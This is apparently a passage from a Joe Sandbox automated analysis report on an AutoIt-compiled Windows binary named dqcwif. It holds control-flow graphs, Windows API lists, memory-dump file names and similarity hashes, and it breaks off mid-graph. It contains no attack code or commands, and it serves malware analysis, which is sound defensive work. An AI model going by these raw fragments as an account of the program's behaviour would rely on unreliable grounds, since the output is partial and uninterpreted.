7ff6b5bbf972-7ff6b5bbfa0d call 7ff6b5b8d1f8 call 7ff6b5b48d58 * 3 call 7ff6b5b44c24 * 3 779->785 790 7ff6b5bbfa4f-7ff6b5bbfa62 call 7ff6b5b44c24 * 2 784->790 785->790 811 7ff6b5bbfabe-7ff6b5bbfaca CloseHandle 790->811 812 7ff6b5bbfa64-7ff6b5bbfabc call 7ff6b5b24afc * 2 GetLastError call 7ff6b5b3f214 call 7ff6b5b313e0 790->812 797->798 824 7ff6b5bbf7f5-7ff6b5bbf800 call 7ff6b5b48d58 797->824 798->761 809->779 818 7ff6b5bbfaf5-7ff6b5bbfafc 811->818 819 7ff6b5bbfacc-7ff6b5bbfaf0 call 7ff6b5b9f7dc call 7ff6b5ba0088 call 7ff6b5bbfb68 811->819 826 7ff6b5bbfb3b-7ff6b5bbfb65 call 7ff6b5b9f51c 812->826 820 7ff6b5bbfafe-7ff6b5bbfb0a 818->820 821 7ff6b5bbfb0c-7ff6b5bbfb35 call 7ff6b5b313e0 CloseHandle 818->821 819->818 820->826 821->826 824->761 824->798
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1787492119-0
                                                                                                          • Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                                                          • Instruction ID: 3e04ef6101a31936978a3337e57bf39ba6af4f00dfb0e4dbaf5e68dcd6338f32
                                                                                                          • Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                                                          • Instruction Fuzzy Hash: 64E18F22A08B8185EB14EB2AD5A01FD67A1FB86F94F004535EF5D877AEDF38E845C740
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2695905019-0
                                                                                                          • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                          • Instruction ID: 9c3b10ae9adc4a633606300ab486fc0be9da791c7a6071efb6887938e15efd9c
                                                                                                          • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                          • Instruction Fuzzy Hash: 9BF05410D4860282EA249B2CB8687F41360AF53FB5F544330DA7F862EADF6C9C584600

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                          • API String ID: 2667193904-1575078665
                                                                                                          • Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                                                          • Instruction ID: 46c46cfcba1c54d765a6c48bc03bf066b3189779b7f32f8eba7d347af21dfc91
                                                                                                          • Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                                                          • Instruction Fuzzy Hash: 28914D22A18A5285EB209F28E8610FD6365FF85B94F804136E74D87AAEDF7CE945C740

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 131 7ff6b5b25dec-7ff6b5b25e21 133 7ff6b5b25e91-7ff6b5b25e94 131->133 134 7ff6b5b25e23-7ff6b5b25e26 131->134 133->134 135 7ff6b5b25e96 133->135 136 7ff6b5b25e98 134->136 137 7ff6b5b25e28-7ff6b5b25e2f 134->137 138 7ff6b5b25e6b-7ff6b5b25e76 DefWindowProcW 135->138 139 7ff6b5b6c229-7ff6b5b6c261 call 7ff6b5b3ede4 call 7ff6b5b42c44 136->139 140 7ff6b5b25e9e-7ff6b5b25ea3 136->140 141 7ff6b5b25f21-7ff6b5b25f29 PostQuitMessage 137->141 142 7ff6b5b25e35-7ff6b5b25e3a 137->142 143 7ff6b5b25e7c-7ff6b5b25e90 138->143 175 7ff6b5b6c267-7ff6b5b6c26e 139->175 145 7ff6b5b25ecc-7ff6b5b25efa SetTimer RegisterWindowMessageW 140->145 146 7ff6b5b25ea5-7ff6b5b25ea8 140->146 144 7ff6b5b25ec8-7ff6b5b25eca 141->144 147 7ff6b5b25e40-7ff6b5b25e43 142->147 148 7ff6b5b6c2af-7ff6b5b6c2c5 call 7ff6b5b9a40c 142->148 144->143 145->144 153 7ff6b5b25efc-7ff6b5b25f09 CreatePopupMenu 145->153 151 7ff6b5b6c1b8-7ff6b5b6c1bb 146->151 152 7ff6b5b25eae-7ff6b5b25ebe KillTimer call 7ff6b5b25d88 146->152 154 7ff6b5b25e49-7ff6b5b25e4e 147->154 155 7ff6b5b25f2b-7ff6b5b25f35 call 7ff6b5b44610 147->155 148->144 167 7ff6b5b6c2cb 148->167 160 7ff6b5b6c1bd-7ff6b5b6c1c0 151->160 161 7ff6b5b6c1f7-7ff6b5b6c224 MoveWindow 151->161 172 7ff6b5b25ec3 call 7ff6b5b27098 152->172 153->144 163 7ff6b5b6c292-7ff6b5b6c299 154->163 164 7ff6b5b25e54-7ff6b5b25e59 154->164 169 7ff6b5b25f3a 155->169 170 7ff6b5b6c1e4-7ff6b5b6c1f2 SetFocus 160->170 171 7ff6b5b6c1c2-7ff6b5b6c1c5 160->171 161->144 163->138 173 7ff6b5b6c29f-7ff6b5b6c2aa call 7ff6b5b8c54c 163->173 165 7ff6b5b25f0b-7ff6b5b25f1f call 7ff6b5b25f3c 164->165 166 7ff6b5b25e5f-7ff6b5b25e65 164->166 165->144 166->138 166->175 167->138 169->144 170->144 171->166 176 7ff6b5b6c1cb-7ff6b5b6c1df call 7ff6b5b3ede4 171->176 172->144 173->138 175->138 180 7ff6b5b6c274-7ff6b5b6c28d call 7ff6b5b25d88 call 7ff6b5b26258 175->180 176->144 180->138
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                          • String ID: TaskbarCreated
                                                                                                          • API String ID: 129472671-2362178303
                                                                                                          • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                          • Instruction ID: bbb6e6c8f8b90649f17ebe5878e0ecd4f134cc44e9915fe8db80844edb301de9
                                                                                                          • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                          • Instruction Fuzzy Hash: 2051593290C65682F770AB1DE8699F92A61AF46F40F440535D64DD62EFCF6EFD058310

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-2659433951
                                                                                                          • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                          • Instruction ID: 43dae3c5a2063321edd787a10cb9f87a500855f7b7c6e57d5f3862dd75103110
                                                                                                          • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                          • Instruction Fuzzy Hash: 66317836A08B018AE740CF65E8597E837B5FB45B49F500138CA8C93BA9DF7CD959CB40

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 189 7ff6b5b3e958-7ff6b5b3e9ae 190 7ff6b5b827e4-7ff6b5b827ea DestroyWindow 189->190 191 7ff6b5b3e9b4-7ff6b5b3e9d3 mciSendStringW 189->191 197 7ff6b5b827f0-7ff6b5b82801 190->197 192 7ff6b5b3e9d9-7ff6b5b3e9e3 191->192 193 7ff6b5b3ecbd-7ff6b5b3ecce 191->193 196 7ff6b5b3e9e9 192->196 192->197 194 7ff6b5b3ecf7-7ff6b5b3ed01 193->194 195 7ff6b5b3ecd0-7ff6b5b3ecf0 UnregisterHotKey 193->195 194->192 201 7ff6b5b3ed07 194->201 195->194 200 7ff6b5b3ecf2 call 7ff6b5b3f270 195->200 202 7ff6b5b3e9f0-7ff6b5b3e9f3 196->202 198 7ff6b5b82835-7ff6b5b8283f 197->198 199 7ff6b5b82803-7ff6b5b82806 197->199 198->197 206 7ff6b5b82841 198->206 203 7ff6b5b82808-7ff6b5b82811 call 7ff6b5b28314 199->203 204 7ff6b5b82813-7ff6b5b82817 FindClose 199->204 200->194 201->193 207 7ff6b5b3e9f9-7ff6b5b3ea08 call 7ff6b5b23aa8 202->207 208 7ff6b5b3ecb0-7ff6b5b3ecb8 call 7ff6b5b25410 202->208 211 7ff6b5b8281d-7ff6b5b8282e 203->211 204->211 216 7ff6b5b82846-7ff6b5b8284f call 7ff6b5bb8c00 206->216 218 7ff6b5b3ea0f-7ff6b5b3ea12 207->218 208->202 211->198 215 7ff6b5b82830 call 7ff6b5ba3180 211->215 215->198 216->218 218->216 221 7ff6b5b3ea18 218->221 223 7ff6b5b3ea1f-7ff6b5b3ea22 221->223 224 7ff6b5b3ea28-7ff6b5b3ea32 223->224 225 7ff6b5b82854-7ff6b5b8285d call 7ff6b5b946cc 223->225 226 7ff6b5b3ea38-7ff6b5b3ea42 224->226 227 7ff6b5b82862-7ff6b5b82873 224->227 225->223 232 7ff6b5b8288c-7ff6b5b8289d 226->232 233 7ff6b5b3ea48-7ff6b5b3ea76 call 7ff6b5b313e0 226->233 230 7ff6b5b8287b-7ff6b5b82885 227->230 231 7ff6b5b82875 FreeLibrary 227->231 230->227 234 7ff6b5b82887 230->234 231->230 235 7ff6b5b828c9-7ff6b5b828d3 232->235 236 7ff6b5b8289f-7ff6b5b828c2 VirtualFree 232->236 242 7ff6b5b3ea78 233->242 243 7ff6b5b3eabf-7ff6b5b3eacc OleUninitialize 233->243 234->232 235->232 240 7ff6b5b828d5 235->240 236->235 238 7ff6b5b828c4 call 7ff6b5ba321c 236->238 238->235 244 7ff6b5b828da-7ff6b5b828de 240->244 246 7ff6b5b3ea7d-7ff6b5b3eabd call 7ff6b5b3f1c4 call 7ff6b5b3f13c 242->246 243->244 245 7ff6b5b3ead2-7ff6b5b3ead9 243->245 244->245 250 7ff6b5b828e4-7ff6b5b828ef 244->250 247 7ff6b5b828f4-7ff6b5b82903 call 7ff6b5ba31d4 245->247 248 7ff6b5b3eadf-7ff6b5b3eaea 245->248 246->243 260 7ff6b5b82905 247->260 252 7ff6b5b3ed09-7ff6b5b3ed18 call 7ff6b5b442a0 248->252 253 7ff6b5b3eaf0-7ff6b5b3eb22 call 7ff6b5b2a07c call 7ff6b5b3f08c call 7ff6b5b239bc 248->253 250->245 252->253 265 7ff6b5b3ed1e 252->265 273 7ff6b5b3eb2e-7ff6b5b3ebc4 call 7ff6b5b239bc call 7ff6b5b2a07c call 7ff6b5b245c8 * 2 call 7ff6b5b2a07c * 3 call 7ff6b5b313e0 call 7ff6b5b3ee68 call 7ff6b5b3ee2c * 3 253->273 274 7ff6b5b3eb24-7ff6b5b3eb29 call 7ff6b5b44c24 253->274 266 7ff6b5b8290a-7ff6b5b82919 call 7ff6b5b93a78 260->266 265->252 272 7ff6b5b8291b 266->272 277 7ff6b5b82920-7ff6b5b8292f call 7ff6b5b3e4e4 272->277 273->266 316 7ff6b5b3ebca-7ff6b5b3ebdc call 7ff6b5b239bc 273->316 274->273 284 7ff6b5b82931 277->284 286 7ff6b5b82936-7ff6b5b82945 call 7ff6b5ba3078 284->286 292 7ff6b5b82947 286->292 295 7ff6b5b8294c-7ff6b5b8295b call 7ff6b5ba31a8 292->295 301 7ff6b5b8295d 295->301 304 7ff6b5b82962-7ff6b5b82971 call 7ff6b5ba31a8 301->304 311 7ff6b5b82973 304->311 311->311 316->277 319 7ff6b5b3ebe2-7ff6b5b3ebec 316->319 319->286 320 7ff6b5b3ebf2-7ff6b5b3ec08 call 7ff6b5b2a07c 319->320 323 7ff6b5b3ed20-7ff6b5b3ed25 call 7ff6b5b44c24 320->323 324 7ff6b5b3ec0e-7ff6b5b3ec18 320->324 323->190 326 7ff6b5b3ec8a-7ff6b5b3eca9 call 7ff6b5b2a07c call 7ff6b5b44c24 324->326 327 7ff6b5b3ec1a-7ff6b5b3ec24 324->327 338 7ff6b5b3ecab 326->338 327->295 330 7ff6b5b3ec2a-7ff6b5b3ec3b 327->330 330->304 332 7ff6b5b3ec41-7ff6b5b3ed71 call 7ff6b5b2a07c * 3 call 7ff6b5b3ee10 call 7ff6b5b3ed8c 330->332 347 7ff6b5b3ed77-7ff6b5b3ed88 332->347 348 7ff6b5b82978-7ff6b5b82987 call 7ff6b5bad794 332->348 338->327 351 7ff6b5b82989 348->351 351->351
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                          • String ID: close all
                                                                                                          • API String ID: 1992507300-3243417748
                                                                                                          • Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                                                          • Instruction ID: e331aa7642b696804a177ef266cbe01a220b0c9d9058372bfe109c9c505a9cbb
                                                                                                          • Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                                                          • Instruction Fuzzy Hash: F1E10022B0994281EE68DB1AC5702FC6360BF96F44F545076DB0EA729BDF3DEC668701

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                          • String ID: AutoIt v3
                                                                                                          • API String ID: 423443420-1704141276
                                                                                                          • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                          • Instruction ID: dd191f7c884037648c81da93d5582472eead897d16e216500e0e53afa59c9ce7
                                                                                                          • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                          • Instruction Fuzzy Hash: 4E313936A08B12CAE781CB94F8597E83775FB88B45F400039CA8DA379ADF7CD8558700

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 419 7ff6b5b67348-7ff6b5b673ba call 7ff6b5b67078 422 7ff6b5b673bc-7ff6b5b673c4 call 7ff6b5b555b4 419->422 423 7ff6b5b673d3-7ff6b5b673dd call 7ff6b5b5e418 419->423 428 7ff6b5b673c7-7ff6b5b673ce call 7ff6b5b555d4 422->428 429 7ff6b5b673f7-7ff6b5b67463 CreateFileW 423->429 430 7ff6b5b673df-7ff6b5b673f5 call 7ff6b5b555b4 call 7ff6b5b555d4 423->430 443 7ff6b5b6771a-7ff6b5b67736 428->443 433 7ff6b5b674eb-7ff6b5b674f6 GetFileType 429->433 434 7ff6b5b67469-7ff6b5b67470 429->434 430->428 438 7ff6b5b67549-7ff6b5b6754f 433->438 439 7ff6b5b674f8-7ff6b5b67533 GetLastError call 7ff6b5b55564 CloseHandle 433->439 435 7ff6b5b674b8-7ff6b5b674e6 GetLastError call 7ff6b5b55564 434->435 436 7ff6b5b67472-7ff6b5b67476 434->436 435->428 436->435 441 7ff6b5b67478-7ff6b5b674b6 CreateFileW 436->441 446 7ff6b5b67556-7ff6b5b67559 438->446 447 7ff6b5b67551-7ff6b5b67554 438->447 439->428 454 7ff6b5b67539-7ff6b5b67544 call 7ff6b5b555d4 439->454 441->433 441->435 451 7ff6b5b6755e-7ff6b5b675ac call 7ff6b5b5e334 446->451 452 7ff6b5b6755b 446->452 447->451 457 7ff6b5b675ae-7ff6b5b675ba call 7ff6b5b67284 451->457 458 7ff6b5b675c0-7ff6b5b675ea call 7ff6b5b66de4 451->458 452->451 454->428 464 7ff6b5b675bc 457->464 465 7ff6b5b675ef-7ff6b5b675f9 call 7ff6b5b604b8 457->465 466 7ff6b5b675ec 458->466 467 7ff6b5b675fe-7ff6b5b67643 458->467 464->458 465->443 466->465 469 7ff6b5b67665-7ff6b5b67671 467->469 470 7ff6b5b67645-7ff6b5b67649 467->470 472 7ff6b5b67677-7ff6b5b6767b 469->472 473 7ff6b5b67718 469->473 470->469 471 7ff6b5b6764b-7ff6b5b67660 470->471 471->469 472->473 475 7ff6b5b67681-7ff6b5b676c9 CloseHandle CreateFileW 472->475 473->443 476 7ff6b5b676cb-7ff6b5b676f9 GetLastError call 7ff6b5b55564 call 7ff6b5b5e548 475->476 477 7ff6b5b676fe-7ff6b5b67713 475->477 476->477 477->473
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617910340-0
                                                                                                          • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                          • Instruction ID: e3592b8dc887cc28a71fe337a1c60caf2d4fc06a2f05bf7514f73cf3c99cf545
                                                                                                          • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                          • Instruction Fuzzy Hash: 4BC1AE32B18B418AEB548F68D4617EC3761E74ABA8F041225DF2E9B7DADF78D855C300

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 557 7ff6b5b325bc-7ff6b5b3263d 561 7ff6b5b3287e-7ff6b5b328af 557->561 562 7ff6b5b32643-7ff6b5b3267c 557->562 563 7ff6b5b32680-7ff6b5b32687 562->563 565 7ff6b5b32856-7ff6b5b32876 563->565 566 7ff6b5b3268d-7ff6b5b326a1 563->566 565->561 568 7ff6b5b326a7-7ff6b5b326bc 566->568 569 7ff6b5b7d148-7ff6b5b7d14f 566->569 570 7ff6b5b329c8-7ff6b5b329eb PeekMessageW 568->570 571 7ff6b5b326c2-7ff6b5b326c9 568->571 572 7ff6b5b7d155 569->572 573 7ff6b5b32702-7ff6b5b32723 569->573 576 7ff6b5b326e8-7ff6b5b326ef 570->576 577 7ff6b5b329f1-7ff6b5b329f5 570->577 571->570 574 7ff6b5b326cf-7ff6b5b326d4 571->574 583 7ff6b5b7d15a-7ff6b5b7d160 572->583 589 7ff6b5b3276e-7ff6b5b327d2 573->589 590 7ff6b5b32725-7ff6b5b3272c 573->590 574->570 580 7ff6b5b326da-7ff6b5b326e2 GetInputState 574->580 581 7ff6b5b7e285-7ff6b5b7e293 576->581 582 7ff6b5b326f5-7ff6b5b326fc 576->582 578 7ff6b5b7d1aa-7ff6b5b7d1bb 577->578 579 7ff6b5b329fb-7ff6b5b32a05 577->579 578->576 579->583 585 7ff6b5b32a0b-7ff6b5b32a1d call 7ff6b5b42de8 579->585 580->570 580->576 586 7ff6b5b7e29d-7ff6b5b7e2b5 call 7ff6b5b3f1c4 581->586 582->573 582->586 587 7ff6b5b7d19b 583->587 588 7ff6b5b7d162-7ff6b5b7d176 583->588 604 7ff6b5b32a1f-7ff6b5b32a2d TranslateMessage DispatchMessageW 585->604 605 7ff6b5b32a33-7ff6b5b32a4f PeekMessageW 585->605 586->565 587->578 588->587 594 7ff6b5b7d178-7ff6b5b7d17f 588->594 626 7ff6b5b327d8-7ff6b5b327da 589->626 627 7ff6b5b7e276 589->627 590->589 595 7ff6b5b3272e-7ff6b5b32738 590->595 594->587 596 7ff6b5b7d181-7ff6b5b7d190 TranslateAcceleratorW 594->596 597 7ff6b5b3273f-7ff6b5b32742 595->597 596->585 601 7ff6b5b7d196 596->601 602 7ff6b5b32748 597->602 603 7ff6b5b328b0-7ff6b5b328b7 597->603 601->605 607 7ff6b5b3274f-7ff6b5b32752 602->607 608 7ff6b5b328b9-7ff6b5b328cc timeGetTime 603->608 609 7ff6b5b328eb-7ff6b5b328ef 603->609 604->605 605->576 610 7ff6b5b32a55 605->610 612 7ff6b5b32758-7ff6b5b32761 607->612 613 7ff6b5b328f4-7ff6b5b328fb 607->613 614 7ff6b5b7d2ab-7ff6b5b7d2b0 608->614 615 7ff6b5b328d2-7ff6b5b328d7 608->615 609->597 610->577 617 7ff6b5b32767 612->617 618 7ff6b5b7d4c7-7ff6b5b7d4ce 612->618 623 7ff6b5b7d2f8-7ff6b5b7d303 613->623 624 7ff6b5b32901-7ff6b5b32905 613->624 619 7ff6b5b328dc-7ff6b5b328e5 614->619 620 7ff6b5b7d2b6 614->620 615->619 621 7ff6b5b328d9 615->621 617->589 619->609 625 7ff6b5b7d2bb-7ff6b5b7d2f3 timeGetTime call 7ff6b5b42ac0 call 7ff6b5ba3a28 619->625 620->625 621->619 628 7ff6b5b7d309-7ff6b5b7d30c 623->628 629 7ff6b5b7d305 623->629 624->607 625->609 626->627 633 7ff6b5b327e0-7ff6b5b327ee 626->633 627->581 630 7ff6b5b7d312-7ff6b5b7d319 628->630 631 7ff6b5b7d30e 628->631 629->628 634 7ff6b5b7d31b 630->634 635 7ff6b5b7d322-7ff6b5b7d329 630->635 631->630 633->627 637 7ff6b5b327f4-7ff6b5b32819 633->637 634->635 638 7ff6b5b7d32b 635->638 639 7ff6b5b7d332-7ff6b5b7d33d call 7ff6b5b442a0 635->639 641 7ff6b5b3290a-7ff6b5b3290d 637->641 642 7ff6b5b3281f-7ff6b5b32829 call 7ff6b5b32b70 637->642 638->639 639->602 645 7ff6b5b32931-7ff6b5b32933 641->645 646 7ff6b5b3290f-7ff6b5b3291a call 7ff6b5b32e30 641->646 652 7ff6b5b3282e-7ff6b5b32836 642->652 648 7ff6b5b32971-7ff6b5b32974 645->648 649 7ff6b5b32935-7ff6b5b32949 call 7ff6b5b366c0 645->649 646->652 654 7ff6b5b3297a-7ff6b5b32997 call 7ff6b5b301a0 648->654 